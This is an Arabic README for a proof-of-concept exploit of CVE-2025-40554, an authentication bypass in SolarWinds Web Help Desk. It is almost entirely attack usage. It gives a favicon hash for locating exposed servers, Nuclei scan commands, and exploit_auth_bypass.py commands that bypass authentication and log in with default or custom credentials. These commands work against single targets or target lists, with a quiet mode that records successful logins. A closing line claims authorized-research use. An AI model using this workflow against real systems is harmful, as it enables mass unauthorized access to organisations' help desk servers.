
إثبات المفهوم لثغرة CVE-2025-40554، وهي تجاوز للمصادقة في SolarWinds Web Help Desk. يشمل قالب Nuclei واستغلال بلغة Python لاختبار هدف واحد أو دفعة مع إمكانية تسجيل الدخول باستخدام بيانات الاعتماد.
http.favicon.hash:"1895809524"
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
pip install -r requirements.txt
هدف واحد (تجاوز + تسجيل دخول، العميل الافتراضي/العميل):
python3 exploit_auth_bypass.py -t https://TARGET:8443
هدف واحد مع بيانات اعتماد مخصصة:
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass
هدف واحد، تجاوز فقط (بدون تسجيل دخول):
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login
قائمة الأهداف (يحفظ الأهداف الضعيفة+تسجيل الدخول فقط):
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt
قائمة الأهداف مع بيانات اعتماد مخصصة:
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret
الوضع الصامت (طباعة عناوين URL التي نجح فيها تسجيل الدخول فقط):
python3 exploit_auth_bypass.py -l result_all.txt -q
إثبات المفهوم هذا مخصص للبحث والاختبار الأمني المصرح به فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. المؤلفون غير مسؤولين عن سوء الاستخدام.